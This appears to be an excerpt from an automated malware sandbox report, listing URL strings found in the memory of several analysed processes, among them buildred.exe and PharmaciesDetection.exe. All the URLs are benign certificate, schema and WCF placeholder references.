Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: firefox.exe, 00000028.00000002.2882551286.000002618E624000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 00000028.00000002.2882551286.000002618E681000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/dates-and-times$
Source: firefox.exe, 00000028.00000002.2882551286.000002618E624000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 00000028.00000002.2882551286.000002618E681000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/regular-expressions
Source: firefox.exe, 00000028.00000002.2882551286.000002618E624000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/strings
Source: firefox.exe, 00000028.00000002.2917052824.00000261936E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2884438644.000002618E7B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2919086701.0000026193AC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2903918367.0000026192703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2903042607.00000261926FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2917052824.00000261936D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2902396300.0000026192403000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: PharmaciesDetection.exe, 00000015.00000000.2653080912.0000000000408000.00000002.00000001.01000000.00000010.sdmp, PharmaciesDetection.exe, 00000015.00000002.2680053271.0000000000408000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/D
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
